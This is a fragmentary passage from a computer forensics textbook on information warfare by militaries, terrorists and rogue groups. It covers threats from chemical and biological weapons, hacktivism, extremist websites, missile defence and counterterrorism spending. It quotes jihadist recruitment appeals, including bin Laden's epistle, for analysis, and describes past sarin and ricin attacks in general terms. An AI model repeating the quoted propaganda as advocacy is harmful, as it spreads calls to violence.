Governments have engaged in the production of chemical weapons
for almost a century and in the production of nuclear and biological weapons for
many decades, during which time proliferation has been continuous and access
ever easier
...
While in the past missiles were deployed only
in wars between states, recently they have played a role in civil wars in Afghanistan
and Yemen
...


402

Computer Forensics, Second Edition

Until the 1970s, most observers believed that stolen nuclear material constituted the greatest threat in the escalation of terrorist weapons, but many now think
the danger could lie elsewhere
...
” Some groups have state sponsors that possess or can
obtain weapons of the latter three types
...
The Aum Shinrikyo cult staged a
poison gas attack in March 1995 in the Tokyo subway; exposure to the nerve gas
sarin killed 10 people and injured 5,000
...

To Use or Not to Use?
If terrorists have used chemical weapons only once and nuclear material never, to
some extent the reasons are technical
...

The manufacture of nuclear weapons is not that simple, nor is delivery to their
target
...
Only governments can legally procure it, so even in this age of proliferation, investigators could trace those abetting
nuclear terrorists without great difficulty
...
Iranian agents in
Turkey, Kazakhstan, and elsewhere are known to have tried to buy such material
originating in the former Soviet Union
...
The
terrorists behind the 1995 attack in Tokyo chose a convenient target where crowds
of people gather, but their sarin was apparently dilute
...
They are relatively easy to procure,
but storage and dispersal are even trickier than for nerve gases
...
Aum Shinrikyo reportedly
released anthrax bacteria (among the most toxic agents known) on two occasions
from a building in Tokyo without harming anyone
...
Difficulties could be overcome, however, and the choice of unconventional weapons will in the end come down to the specialties of the terrorists and
their access to deadly substances
...
The risk of detection and subsequent severe retaliation or punishment is
great, and although this may not deter terrorists, it may put off their sponsors and
suppliers
...
Unconventional weapon strikes could render whole regions uninhabitable
for long periods
...
And although terrorism seems to be tending toward more indiscriminate killing and mayhem, terrorists may draw the line at weapons of
superviolence likely to harm both foes and large numbers of relatives and friends,
for example, Kurds in Turkey, Tamils in Sri Lanka, or Arabs in Israel
...
There is not much heroism in spreading botulism or anthrax
...

Broadly speaking, terrorists will not engage in overkill if their traditional
weapons (the submachine gun and the conventional bomb) are sufficient to continue the struggle and achieve their aims, but the decision to use terrorist violence
is not always a rational one; if it were, there would be much less terrorism, because
terrorist activity seldom achieves its aims
...
It might also lead to a last desperate attempt to defeat the hated enemy by arms not tried before
...

Post Apocalypse
Terrorist groups traditionally contain strong quasi-religious, fanatical elements,
for only total certainty of belief (or total moral relativism) provides justification
for taking lives
...
Fanatical Muslims consider the killing of the enemies of God
a religious commandment and believe that the secularists at home as well as the
State of Israel will be annihilated because it is Allah’s will
...
Sectarian fanaticism has surged during the past decade, and, in general, the smaller the group,
the more fanatical the group
...
Nevertheless, the belief in the
impending end of the world is probably as old as history, but for reasons not entirely clear, sects and movements preaching the end of the world gain influence toward the end of a century, and all the more at the close of a millennium
...
Others, however, believe that the
sooner the reign of the Antichrist is established, the sooner this corrupt world will
be destroyed and the new heaven and earth foreseen by St
...

Extremist millenarians would like to give history a push, helping create worldending havoc replete with universal war, famine, pestilence, and other scourges
...
They have their own
subcultures, produce books and CDs by the thousands, and have built temples and
communities of whose existence most of their contemporaries are unaware
...
Although the more extreme
apocalyptic groups are potentially terrorist, intelligence services have generally
overlooked their activities; hence, the shock over the subway attack in Tokyo and
Rabin’s assassination, to name but two recent events
...
For instance, extreme environmentalists, particularly the socalled restoration ecologists, believe that environmental disasters will destroy
civilization as they know it (no loss, in their view) and regard the vast majority of
human beings as expendable
...
If the eradication of smallpox
upset ecosystems, why not restore the balance by bringing back the virus? The
motto of Chaos International, one of many journals in this field, is a quotation
from Hassan I
...
The premodern world and postmodernism meet at this point
...
The practitioners of terrorism,

The Information Warfare Arsenal and Tactics of the Military

405

up to the present time, were nationalists and anarchists, extremists of the left and
the right, but the new age has brought new inspiration for the users of violence
...
In the future, terrorists will be individuals or like-minded
people working in very small groups (like the 9-11 terrorists), on the pattern of the
technology-hating Unabomber, who apparently worked alone sending out parcel
bombs for over two decades, or the perpetrators of the 1995 bombing of the federal
building in Oklahoma City
...
The ideologies such individuals and minigroups
espouse are likely to be even more aberrant than those of larger groups
...

Thus, at one end of the scale, the lone rogue terrorist has appeared, and at the
other, state-sponsored terrorism is quietly flourishing in these days when wars of
aggression have become too expensive and too risky
...

Proliferation of the weapons of mass destruction does not mean most terrorist
groups are likely to use them in the foreseeable future, but some almost certainly
will, in spite of all the reasons not to
...
Individuals and small
groups, however, will not be bound by the constraints that hold back even the most
reckless government
...
Earlier terrorists could kill kings or high officials, but others only too
eager to inherit their mantle quickly stepped in
...
Defense, the police, banking, trade, transportation,
scientific work, and a large percentage of the government’s and the private sector’s
transactions are online
...
Hence, the growing speculation about infoterrorism
and cyberwarfare
...
S
...
What he could achieve, a terrorist

406

Computer Forensics, Second Edition

could too
...
The possibilities for creating chaos are almost unlimited even now, and
vulnerability will almost certainly increase
...
If the
new terrorism directs its energies toward IW, its destructive power will be exponentially greater than any it wielded in the past—greater even than it would be with
biological and chemical weapons
...
Electronic thieves, whether
engaged in credit card fraud or industrial espionage, are part of the system, using it
rather than destroying it; its destruction would cost them their livelihood
...
The Kurdish Workers Party, the IRA, the Basque ETA, and
the Tamil Tigers want to weaken their enemies and compel them to make farreaching concessions, but they cannot realistically hope to destroy them
...

All that leads us well beyond terrorism as has the military has known it
...
The Bible says that when the Old Testament hero Samson brought down the temple, burying himself along with the
Philistines in the ruins, “the dead which he slew at his death were more than he slew
in his life
...
But with the
new technologies and the changed nature of the world in which they operate, a
handful of angry Samsons and disciples of apocalypse would suffice to cause havoc
...

The Menace of Amateur Rogue IW
According to DoD government analysts, with a member base of 79,000, the amateur
rogue CyberArmy (hackers) may have the biggest armament the Net has ever seen,
rallying to take down Web sites that “abuse” the World Wide Web—and removing

The Information Warfare Arsenal and Tactics of the Military

407

power from governments
...

The CyberArmy wants to regulate the Internet so that the government doesn’t
come in and regulate it
...
Growing to a full size army of
“Netizens,” the group has since shifted its views—because of privacy issues and
government intervention
...
If you
deregulate, you end up with anarchy
...
Members have to solve puzzles (which is usually breaking codes and
encryption) to move on to the next commanding level
...
Some missions include hunting for, and taking down, child
pornography Web sites
...
Colonel, Colonel, General, and Marshal
...

This division has taken down about four dozen child porn sites in the last few
years, and was also instrumental in bringing down the Wonderland Club child porn
ring recently
...
Because the Internet is global, governments aren’t the right authority to police it
...
If a site
is defaced it’s usually in the form of protest
...
However, they’re moving away from that
...
Many people join CyberArmy
because they are sick and tired of child pornography and Net censorship
...
The
CyberArmy site also posts discussion boards and Internet tools for users and has a
section dedicated to teaching network security
...
U
...
citizens and
the organizations that provide them with the vital services they need can find no
sanctuary from these attacks
...
S
...
The consequences of a well-planned and coordinated
attack by a relatively sophisticated foe could be serious
...
How the public will respond to
the threat of IW infrastructure attacks or to actual attacks is unclear but will be a
major determinant of future policy and actions
...
U
...
citizens are becoming increasingly dependent on automation in every aspect of their lives
...
With this increased need for exchanges of information (and products), vulnerabilities increase
...

Given this situation, you need to focus on two goals
...
Second, you need to build a
firm foundation upon which you can make steady progress by continually raising
the cost of mounting an attack and mitigating the expected damage of the IW arsenal and tactics of the military
...

Conclusions
Information warfare (IW) has become virtually synonymous with the revolution in information technologies and its potential to transform military strategies and capabilities
...
Without being
able to defend vital information, information processes, and information systems, such a strategy is doomed to failure
...

The battlespace associated with IW has been a constantly expanding one, moving far beyond traditional military situations
...
This has
stretched the meaning of IW to the breaking point and has sowed more confusion than enlightenment
...


The Information Warfare Arsenal and Tactics of the Military

409

The scope, or battlespace, of information warfare and strategy (IWS) can be defined by the players and three dimensions of the nature of their interactions,
the level of their interactions, and the arena of their interactions
...
Nonstate actors (including political, ethnic, and religious groups; organized crime;
international and transnational organizations; and even individuals empowered by information technology) are able to engage in information attacks and
to develop information strategies to achieve their desired ends
...
These include
activities that range from propaganda campaigns (including Media War), to attacks (both physical and nonphysical) against commanders, their information
sources, and the means of communicating with their forces
...

Technological advances have added new forms such as electronic warfare (EW)
and “hacker warfare
...

Strictly speaking, because these attacks can be launched during peacetime at
nonmilitary targets by nonmilitary groups, both foreign and domestic, the term
IW-D should be IWS-D
...

This overview of IW-D does not attempt to deal with the problems of defending against all of the different kinds of information attacks, but rather focuses
its attention on the subset of IW that involves attacks against information infrastructure, including what has become known as “hacker warfare” and in its
more serious form, “digital warfare
...
Some military
organizations have been worrying about this for a long time and have developed and

410

Computer Forensics, Second Edition

implemented plans to keep on top of this increasingly serious set of threats
...
It might be helpful, even for those military organizations that feel they are well prepared, to review the list of suggested action steps to determine what they need to do to be better prepared for the future
...
With the preceding in mind, when completing the Information Warfare
Arsenal and Tactics of the Military Checklist (Table F14
...
The order is not significant; however, these are the activities for which
the researcher would want to provide a detailed description of procedures, review,
and assessment for ease of use and admissibility
...

Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and optional team case project
...


CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...

2
...

3
...

4
...

5
...

Multiple Choice
1
...

B
...

D
...


411

Operations security
Commercial deception
Psychological operations
Electronic warfare
Targeting

2
...
Terrorism
B
...
Counterterrorism versus new terrorism
D
...
S
...
General counterterrorism strategy
3
...
Attempt to deal with the problems of defending against all of the different
kinds of information attacks
B
...
Make deterrence relevant to non-state actors as well as state sponsors
D
...
DoD has also articulated a similar concept for an office within the Executive
Office of the President, organized for countering terrorism, as a potential focal
point for the oversight of the U
...
antiterrorist program
...
Monitor and coordinate activities of the line agency and departments
...
Identify unneeded capabilities
...
Identify special resources that might be mobilized if an international incident occurs
...
Pull together current intelligence and ongoing analysis and research efforts
...
Identify terrorist incidents
...
Nation-states or combinations of nation-states are not the only players
...
Political, ethnic, and religious groups
B
...
Law enforcement organizations
D
...
Individuals empowered by information technology

412

Computer Forensics, Second Edition

Exercise
The board of directors of a technical research company demoted the company’s
founder and chief executive officer
...
Upon his termination, the executive took home two computers; he returned them to the company five days later, along with another company computer
that he had previously used at home
...
How did the CFST go about conducting the forensics examination?

HANDS-ON PROJECTS
A senior member of a major organization was under suspicion of downloading thousands of pornographic images from the Internet
...
How did the CFS go about conducting the investigation?
Case Project
A major high-tech company took-over a smaller subsidiary in a related, but noncompeting, business area
...
Most of the previous management team was bought-out and left the
company; others were persuaded to stay on to manage the new subsidiary
...
Business results of the new subsidiary had simultaneously begun to deteriorate
...
How did the CFST go about conducting their examination?
Optional Team Case Project
An insurance company was contesting a claim for $400,000 for loss of all data from
a company’s central computer
...
How
was the CFST able to help the insurance company?

The Information Warfare Arsenal and Tactics of the Military

413

REFERENCES
[1] Vacca, John R
...

[2] Vacca, John R
...

[3] Vacca, John R
...

[4] Vacca, John R
...

[5] Vacca, John R
...

[6] Vacca, John R
...


This page intentionally left blank

15

The Information Warfare
Arsenal and Tactics of
Terrorists and Rogues

he information warfare (IW) arsenal and tactics of terrorists and rogues have
become increasingly transnational as the networked organizational form has
expanded
...
Now
that terrorism is increasingly substate, or semidetached, networking and interconnectivity are necessary to find allies and influence others, as well as to effect command and control
...
It therefore might be said that a shift is taking place
from absolute hierarchies to hydra-headed networks, which are less easy to decapitate
...
In many ways the Afghan War was a seminal event in promoting the networked
form in that it showed that fluidly organized groups, driven in this case by a religious
imperative, could defeat an experienced hierarchically structured army
...

A rigid hierarchical structure is more easily penetrated and neutralized
...
An investigation by the Federal Bureau of
Investigation into terrorist activity in the United States indicated that part of Palestinian Islamic Jihad’s command and control system was located in Tampa, Florida
...


T

415

416

Computer Forensics, Second Edition

Islamist terrorists may be said to fit the network ideal
...

It is not the intention here that the term “Islamists” should refer only to terrorist
organizations, but rather to those Muslim militants who believe that Islam is incomplete without its own state, one in which Shariah provides the system of governance, and who campaign for its imposition
...
The followers of Hasan al Banna, Sayyid Qutb, and Abdul Ala
Maududi, the organizations they founded, Ikhwan al Muslimoon and Jamaat Islami, and the ideological off-shoots these have spawned, give rise to the Jihadist ideology
...

The ultimate experience is, of course, Jihad, which for Islamists means armed battles against communists (Afghanistan) or Zionists (Palestine and Israel) or, for the
radicals, against renegades and the impious
...
An example of
the networked form among such Islamist organizations is that of the Algerian Armed
Islamic Group, the GIA
...
At the same time, sympathizers were also safe-housing some of its weapons and explosives in Belgium
...
Foremost among them is MSANEWS
...

The MSANEWS also posts articles and communiqués from non-Islamist Muslim
and non-Muslim sources, claiming that it has condemned terrorism and that it no
longer reposts communiqués of organizations that advocate terrorism
...
As with some other Islamist groups, Muslimedia International also promotes antisemitism and Holocaust denial and provides links with the American
Holocaust denier, Michael Hoffman II and his Campaign for Radical Truth in History, thereby highlighting the interconnectivity possibilities between totally different
ideologies sharing a perceived common enemy
...
Recently, U
...
law enforcement officials and other experts disclosed details of how extremists hide maps and
photographs of terrorist targets in sports chat rooms and on pornographic bulletin
boards and other popular Web sites
...
To a greater and greater
degree, terrorist groups, including Hezbollah, Hamas, and bin Laden’s al Qaeda, are
using computerized files, email, and encryption to support their operations—like
the train bombing in Madrid in the winter of 2004
...
It’s something the
intelligence, law-enforcement, and military communities are struggling to deal with
...
Only the members of the terrorist organizations, knowing the hidden
signals, are able to extract the information
...
Their first U
...
-based site was hosted
by Imperial College, London, but following complaints to the college authorities,
the site was closed down
...
Al-Muhajiroun (The Emigrants) whose U
...
leader,
Omar Bakri Mohammed, was the founding leader of Hizb-ut-Tahrir in Britain, and
from which he split claiming differences with the Middle-East-based leadership,
also provides details of its activities, as well as lists of its hardcopy publications and
contacts
...
As a consequence of his endorsement of the
bombings of the U
...
embassies in Dar-es-Salaam and Nairobi, his postings are no
longer carried by MSANEWS
...
MSANEWS provides a list of Internet resources about Hamas,
including copies of its covenant, its official communiqués (at Assabeel On-line),
and communiqués of its military wing, the Izz al-Din Al-Kassam Brigades
...
Hamas’ own site, which
posts in Arabic, is the Palestine Information Centre
...
Sheikh Yusuf al-Qaradawri of the Egyptian
Ikhwan al-Muslimoon (Muslim Brotherhood) lives in Qatar and serves as the
Imam (religious leader) for the Palestinian Hamas
...
Sheikh Abu
Hamza, an Egyptian national and former Afghan Jihad volunteer, serves as a propagandist for the Algerian GIA and Imam for the Yemeni Jihad group but lives in
London
...

Although some commentators have argued that modern cultural forces, such
as ICTs, serve to undermine Islamization in Muslim society, it is equally easy to
argue that they provide a new and growing medium by which Islamism is disseminated
...
The growing number of advertisements, on the Internet and in Muslim
papers and journals, for conferences to discuss the use of the Internet to promote
Islam, or Islamism, supports the thesis that many activists and religious teachers see
these developments as positive ones to be recommended and encouraged
...
Calls to carry out Jihad are frequently cloaked in
religious and pseudo-religious language, but the implication is clear for the target
audience
...
For example, bin Laden’s Ladenese Epistle reads,
The sons of the land of the two Holy Places had come out to fight against the Russian in Afghanistan, the Serb in Bosnia-Herzegovina, and today they are fighting in
Chechenia and—by the Permission of Allah—they have been made victorious
over your partner, the Russians
...


The Information Warfare Arsenal and Tactics of Terrorists and Rogues

419

I say: Since the sons of the land of the two Holy Places feel and strongly believe that
fighting (Jihad) against the Kuffar in every part of the world, is absolutely essential;
then they would be even more enthusiastic, more powerful and larger in number
upon fighting on their own land
...
A recent posting, “The Islamic Legitimacy of the Martyrdom Operations,” states that martyrdom is forbidden in Islam,
but cites approvingly those martyrs who willingly gave their lives for Muslim causes
and then transposes these causes to contemporary issues
...

Azzam Publications, named after Abdullah Azzam, a Palestinian who became
a military leader in Afghanistan and who was assassinated in Pakistan in 1989, has
also published calls for Jihad volunteers:
The Saudi Government does not intend to help the Muslims in Kosova and it has
prevented its nationals from going there to fight
...
Redistribute this e-mail message all over the world
...
e-mail the Saudi
Embassy in Washington with messages of protest
...
Wait for the Kosova bulletin from Azzam Publications
...
K
...
The group is tiny, but its foreign contacts are numerous, widespread and
growing
...

Final Conflict also acts as a news agency for Holocaust deniers (in much the
same way as MSANEWS does for Islamists), many of whom are also far right extremists
...
Some invitees to a conference held by the Adelaide Institute were
refused permission to visit Australia by its Department of Immigration, but the easy
access to the Internet and video links facilitated conference presentations that otherwise might not have taken place
...
The British neo-Nazi, David Myatt, of the National Socialist Movement posted his Practical Guide to Aryan Revolution in November 1997 at the Web site of Canadian Bernard Klatt in order to evade police
scrutiny
...

The contents provided a detailed step-by-step guide for terrorist insurrection with
advice on assassination targets, rationales for bombing and sabotage campaigns,
and rules of engagement
...
Myatt is currently
the subject of a British criminal investigation for incitement to murder and promotion of race hatred
...
Herve Guttuso, the French leader of the
Charlemagne Hammer Skins, was arrested in Essex at the same time as eight members were arrested in the South of France
...
According to the French Interior Ministry, police in Toulon traced the London address of the Internet site, which was being
accessed about 7,000 times a month
...
The investigators found that the
Charlemagne group appeared to be one of the largest and best organized neo-Nazi
groups yet uncovered, with a coordinated international structure and logistical centers for disseminating violent racist propaganda, based principally in Britain and
America
...

The British far right may have been slower to realize the command and control
possibilities of ICTs than their U
...
or German co-ideologies, but they appear to be
catching up
...

In 1999, the Pentagon had to admit that there had been a major assault on its
computer systems
...
It doesn’t matter what government

The Information Warfare Arsenal and Tactics of Terrorists and Rogues

421

specialists invent to counter the techno-terrorist; there is always a way around their
antihacker programs, and the more ZOG relies on computers, the more damage can
be done by attacking their systems
...
” Some groups are more direct and refer to the Jewish Occupied Government
...


THE TERRORIST PROFILE
Sid-Ra, a 6-foot-4-inch, 350-pound giant of a man, paces between his “subjects” in
the smoke-filled Goth club Click + Drag, located in the old meat-packing district of
Manhattan
...
Sid is a hacker-terrorist and an acknowledged “social engineer” with curious nocturnal habits
...
When night comes, they transform into something quite different
...
They even have a name for it: hactivism
...
Recently, for example, the Libertarian Party set
up a table at the HOPE (Hackers on Planet Earth) conference
...

Even without such civil-liberties groups trying to organize them, hactivists have
been busy on their own
...
in Montreal
...
(http://www
...
com), and they’re trying to get the Internet out to third world
human rights organizations through groups such as Cult of the Dead Cow Communications (cDc; http://www
...
com/)
...

Sid feels hactivism’s pull so strongly that he makes a dramatic claim: “The Internet is the next Kent State, and we’re the ones who are probably going to get shot
...
Except for the four-year jail terms handed
down to Kevin Mitnick and Kevin Poulsen, sentencing for even criminal hacking in
2003–2004 has been relatively light (mostly probation and fines) because of the suspects’ young ages
...
Mitnick’s last arrest was by the FBI on February 15, 1995—he was charged with
breaking into some of the United States’ most “secure” computer systems
...
” He worked for SRI International by
day, and hacked at night
...
Among other things, he reactivated old Yellow Page escort
telephone numbers for an acquaintance who then ran a virtual agency
...
Poulsen is now a journalist and serves as editorial director for SecurityFocus
...

The government tries to put electronic activism into the peg of cyberterrorism
and crime with its infowar eulogies (IW success stories), but E-Hippies, cDc, and
others aren’t criminals
...
Another group
reaching out to hackers and technologists is the EFF
...

Hackers question conventional models
...
” They say, “How can I make it better?” They look at society that way too—their government, their schools, and their social situations
...

In the Motion Picture Association of America (MPAA) case, staffers at 2600
Enterprises Inc
...
Because the link was editorial content, it set Sid off on another
diatribe
...
At HOPE, the
party’s New York State committee (http://www
...
com) handed out fliers,
signed up recruits, and took a “sticker” poll of party affiliations
...
Many party members are programmers
...
Hackers can
offer them freedom, because the Internet routes around tyranny
...

Take a young dude named Alpha Underflow, for instance, who late one night broke
the lock to a lit-up roadside-construction sign and reprogrammed it to read, “Hack
Planet Earth” in support of the 2600 Magazine staff, but then, he also likes to use his
reprogrammed garage-door opener to pop open his neighbor’s garage doors
...
In the mid-1990s, there was
more disillusionment as more bleeding-edge hackers ended up going to jail for
cracking
...

That means the older hackers do develop some scruples
...
eff
...
Now it’s rarely hacked
...
The process that turned the
hippie of 1968 into the employed investor of 1985 is similarly going on here today
...

Who are the real cyberterrorists? Are they for real?
Will the Real Cyberterrorists Stand Up

The debate over whether the United States faces imminent danger from cyberterrorist attacks took a new turn recently when the National Security Council declared
that terrorism may be too strong a word when describing potential cyberthreats
...

Maybe we shouldn’t be saying “cyberterrorism
...
” In the end, we’re going to know it when we see it—the difference
between joy-riding hackers and state-sponsored cyberattacks
...
Although the
government tries to be proactive, the United States is going to get nailed seriously—
sooner rather than later
...
A lot of people are going to be
willing to throw civil liberties out the window in an effort to recover from an attack
that cripples large portions of the nation’s critical infrastructure
...
Overall, however, cyberdefense is not well
understood and is not talked about sufficiently
...
Rogue groups have made numerous efforts to acquire encryption
algorithms and sophisticated tools
...

The Internet has become a new form of the “dead drop” (a Cold War–era term
for where spies left information) for terrorists and, bin Laden, the dissident and
wanted Saudi businessman who has been indicted for the 1998 bombing of two
U
...
embassies in East Africa, the 9-11 attacks in 2001, the bombing of the USS Cole
destroyer in Yemen, and the 2004 train bombing in Madrid, Spain, has taken advantage of that Internet dead drop zone
...
Officials say bin Laden began using encryption in
1996 but recently increased its use after U
...
officials revealed they were tapping his
satellite [1] phone calls in Afghanistan and tracking his activities
...
) to facilitate jihad against the Israeli occupiers and their supporters, according to Ahmed Yassin, the founder of the
militant Muslim group Hamas
...


WHY TERRORISTS AND ROGUES HAVE AN ADVANTAGE IN IW
Governments have neither the financial resources nor the technical know-how to
stay on top of hackers and computer terrorists
...
The private sector must itself take much of the action that
is necessary to prevent attacks being made on the Internet
...

There are no cookie-cutter solutions; every network is different
...
com, eBay, and other high-profile
Web sites to their knees
...

Second on the list of concerns is attacks that reach into networks to steal valuable corporate data
...
There is a real danger of terrorists and hostile rogue nations using
computer networks to wage international warfare
...
Cyberterrorism can be more effective and more costly to governments than the classic methods of bomb attacks and assassination
...

Solutions seem harder to come by today than solutions to the problems just
discussed
...
Companies must be more willing to invest in security systems to protect their networks
...
Default settings for software products sold to consumers should be at the highest level of security
...
Basically, that’s just what
the software companies are doing
...

If you have a choice of spending five million dollars on getting 693,000 new customers, or five million dollars on better serving the ones you already have, that’s a
difficult value proposition
...

The severity of attacks could get worse, though, and businesses would be wise to
make precautionary investments now
...

Cyberattack Risks If You’re a Superpower
IW and other security threats simply come with the territory when your country is the
world’s only remaining superpower
...

There is no other country that can challenge the United States directly
...
This challenge could
come in the form of nuclear (see sidebar, “Stopping Nuclear Blackmail”), chemical,
biological (see sidebar, “Chemical and Biological Terrorism”), or even cyberwarfare
(see sidebar, “Hacker-Controlled Tanks, Planes, and Warships”) attacks
...
In a few years, and without much warning, Iranian and Iraqi missiles

426

Computer Forensics, Second Edition

could also be targeted at us and our allies
...

None of this was clear in 1998; it is undeniable now
...
S
...

A full warning came in a 1998 report of the commission on missile threats
headed by Defense Secretary Donald Rumsfeld
...
The panel had access to
all U
...
intelligence sources, and its conclusion was unanimous: rogue states could
inflict major destruction on the United States within five years of deciding to do so,
and with little or no notice to us
...
That conclusion was based on a 1995
national intelligence estimate that said there would be no threat to the 48 contiguous states for the next 15 years
...

The Rumsfeld report at first seemed to do little to change the views of President
Clinton’s top defense advisers
...
Henry
Shelton, the chairman of the Joint Chiefs of Staff, wrote that “the intelligence community can provide the necessary warning” of hostile missile development and
added, “We view this as an unlikely development
...
The
launch indicates that North Korea has made progress in building the Taepo Dong 2,
whose 10,000-kilometer range includes not only Alaska and Hawaii but also much
of the continental United States
...


A N EW W ORLD
The case against rapid deployment rests on three arguments: (1) the threat isn’t real,
(2) the technology is impossible, and (3) it is more important to maintain the
antiballistic missile treaty signed with the Soviet Union in 1972, which bars most
missile defense systems
...
Argument 2
is still raised by some who note that the United States has spent large sums on missile

The Information Warfare Arsenal and Tactics of Terrorists and Rogues

427

defense since Ronald Reagan proposed it in 1983, with disappointing results, but
stopping a few rogue-state missiles with the computers of 2005 is much easier than
stopping hundreds of Soviet missiles with the computers of 1983
...
The argument for the treaty was that a missile defense system might
provoke a Soviet or American first strike
...


CHEMICAL AND BIOLOGICAL TERRORISM
In For Your Eyes Only, James Bond’s irrepressible quartermaster, Major Boothroyd
(a
...
a
...
Using a faceless mannequin, one of Q’s assistants illustrates how the umbrella looks and acts like it should
until struck by water (as umbrellas are wont to do from time to time)
...
The motion is quick and precise, but one can’t help but imagine
the far messier spectacle if a human being were caught under it in a rainstorm
...
In September 1978, the Bulgarian secret service shot a Bulgarian exile,
Georgi Markov, with just such a device
...
The pellet contained only a few hundred millionths of a gram of the deadly poison ricin (supplied by the KGB), but it
was enough
...
Another Bulgarian
defector, Vladimir Kostov, was similarly attacked in Paris the month before
...
He sought medical treatment after hearing of Markov’s death and doctors removed from his back a small
pellet identical to the one used to kill Markov
...
In their infamous sarin gas attack on the Tokyo subway, Aum
operatives chose the decidedly low-tech dissemination method of dropping bags of
liquid sarin on the floor, puncturing them with the sharpened ends of their umbrellas, and then beating a hasty retreat as the nasty stuff spilled out onto the ground
...


428

Computer Forensics, Second Edition

Analysts have long commented on the copycat nature of terrorists and terrorist
groups
...
Given such a phenomenon
among terrorists, is the United States witnessing any evidence of an increase in the use
of umbrellas in terrorist operations—especially those involving chemical and biological weapons? Should the United States be calling for an international embargo on
umbrella sales to Afghanistan to prevent Osama bin Laden and his al-Qaeda organization from acquiring such dangerous, dual-use technology? Probably yes
...
Although the jury is still out, Aum may
have been unique
...
Rather than use an umbrella,
the MPC experimented with using hand lotion as a means of dissemination
...
Not even the Weather Underground, whose name would
seem to imply an interest in such methods, showed evidence of ever considering
using umbrellas in any of their attacks
...
So the answer is yes, the standard terrorist arsenal is
now the gun, the bomb, the plane bomb, box cutters, and even the umbrella or anything else they can get their hands on
...


HACKER-CONTROLLED TANKS, PLANES, AND WARSHIPS
Army officials are worried that sophisticated hackers and other cyber criminals,
including military adversaries, may soon have the ability to hack their way into and
take control of major military weapon systems such as tanks and ships
...
Unlike in the past, today’s modern tanks and ships are almost
entirely dependent on computers, software, and data communications links for
functions such as navigation, targeting, and command and control
...

In fact, the Defense Department (DoD) has already tested and proven that hackers

The Information Warfare Arsenal and Tactics of Terrorists and Rogues

429

have the ability to infiltrate the command and control systems of major weapons,
including Navy warships
...

Yes, this actually happened
...
Fortunately, this was only a controlled test to see what could be done
...

Although there are well-known security gaps in the commercial systems that the
Army plans to use on the battlefield, hacking into tanks and other weapons may be too
difficult for an enemy engaged in battle
...
Such tactics would be nearly impossible to employ beyond the random harassment level
...
In addition to the two dozen countries known to be pursuing technologies that would enable them to produce weapons of mass destruction, threats to the nation’s critical infrastructure from cyberattacks are also high on
the present administration’s list of things to prepare for
...
If you can shut down the
United States’ financial system, if you could shut down the transportation system, if
you could cause the collapse of an energy production and distribution system just by
typing on a computer and causing those links to this globalization to break down,
then you’re able to wage successful warfare, and the United States has to be able to
defend against that
...

U
...
Government Agencies Shape Cyberwarning
Strategy Against Terrorists and Rogues
Under pressure from Congress to better coordinate the government’s response to
computer viruses and other cyberattacks by terrorists and rogue states, the National
Security Council (NSC) has developed a plan outlining roles and responsibilities for
federal cybersecurity organizations
...

The memo describing this plan identifies the organizations and agencies to be
involved in various kinds of attacks and defines the criteria for NIPC to call a meeting of the full cybersecurity community
...
This institutionalizes how the United States will share information, both at an operations level and
at a policy level when cyberincidents occur
...

NIPC, based at the FBI, was established in 1998 to serve as the government’s
central organization to assess cyberthreats, issue warnings, and coordinate responses
...
The proliferation of organizations with overlapping oversight
and assistance responsibilities is a source of potential confusion among agency personnel and may be an inefficient use of scarce technical resources
...
The lack of formal coordination
and communication led to many more agencies being affected by the incident than
necessary, according to the Government Accounting Office
...
In the past, that type of coordination happened on an ad hoc basis
...

Some of the formal mechanisms that existed were frankly ineffective in the
tasks they were meant to do
...


THE DARK WORLD OF THE CYBER UNDERGROUND
It was nearly Christmas (1998) when Dionne Smith received an alarming letter
that dampened her holiday spirit—to say the least
...
The 1998 Christmas incident was a horrible and frightening
experience—which was one of approximately 220 nuclear, biological (see sidebar,
“Bioterrorists on the Green”), and chemical scares (including some 140 anthrax
false alarms) in this country alone
...
S
...
The fear is that if some party wanted to, they
could damage a major crop—and the economy—by introducing a plant pathogen
that doesn’t normally exist here
...
If the
group were sophisticated enough, they could genetically engineer a highly pathogenic strain, produce it in large quantities, and sneak a lot of it in
...
Ninetynine percent or more of the genes in crops are the same across the United States, and
that uniformity makes an epidemic much more likely
...
Even then, spores could survive and infect the next year’s crop
...
It would
be a continuing, recurring problem, like a permanent bomb going off
...
Their major
worry is that terrorists are adding chemical and biological weapons to their arsenal
of arms, and that, one day, they’ll make good on their threats
...
The ambitious plans include
amassing antidotes to potential bioagents such as anthrax and other bacteria and
viruses and to chemical weapons such as the nerve agent sarin
...
These new
programs have helped make counterterrorism one of the fastest-growing parts of
the federal budget, even as terrorist acts plunged to a 33-year low prior to the 9-11
attacks, according to congressional budget analysts
...
S
...
The question is
whether it’s money well spent
...
A growing number of government and private counterterrorism experts agree
...
It’s Mom, apple pie, and
terrorism
...
Today, there are some 400 training courses run by myriad agencies, including the Energy and Justice Departments, the Environmental Protection
Agency, and the Federal Emergency Management Agency (FEMA)
...
In 1996, HHS spent $7 million on its “bioterrorism” initiative
...
Most notably, the department intends to create a national stockpile of millions of doses of
vaccines and antibiotics, a potential boon for pharmaceutical companies that are
among those eagerly lobbying for more antiterrorism measures
...

None of these potential killers appear on the CIA’s list of biggest germ threats from
terrorist groups
...
Tularemia
and pneumonic plague are very easy to develop
...

Other agencies are clamoring for a piece of the pie, leading to tremendous internecine fighting
...
The Department of Veterans
Affairs wants to wrest stockpiling duties away from the Centers for Disease Control
and Prevention, and the National Guard, a powerful lobby on Capitol Hill, is creating its own hazardous materials response teams, even though there are already
more than 800 state and local hazardous material (HAZMAT) units, plus additional crews in the Army, Marine Corps, EPA, and Coast Guard
...
Not to be left out, the
United States Holocaust Memorial Museum and the Office of Personnel Management want $6 million apiece, and the Smithsonian Institution is asking for $7 million to bolster security against potential terrorist attacks
...
The 1995 Tokyo subway
gas attack by the cult Aum Shinrikyo was a shot across the bow
...
S
...

The only major case of bioterrorism in the United States was in 1984 by followers
of the Indian guru Bhagwan Shree Rajneesh, who had set up a commune in Oregon
...
Still, law enforcement officials
are convinced that the risk merits whatever preventive measures the government can
afford
...

One reason there have been no attacks is that it’s so tough to effectively use biological weapons, but a dozen hostile nations now either possess or are actively
pursuing bioweapons
...
They also agree that terrorists cannot
carry out large-scale lethal attacks without the backing of a foreign government
...
The question is, how much? Nobody knows, because few have bothered to assess how real the threats are
...
It’s one of those things it’s hard to
say no to
...
Was that wrong to do? You have to
look at the world you’re operating in
...
